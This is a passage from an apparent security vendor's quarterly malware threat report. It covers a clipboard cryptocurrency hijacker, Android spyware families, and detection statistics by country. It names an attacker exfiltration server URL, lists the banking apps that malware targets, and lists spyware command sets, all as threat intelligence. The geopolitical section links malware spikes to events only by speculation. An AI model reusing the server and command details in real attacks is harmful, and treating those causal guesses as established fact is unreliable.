- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 23 of 73
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible
Now letrsquos see at the URL httpscnhvco
And there we can find the familiar link to CoinHive
The link to CoinHive
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
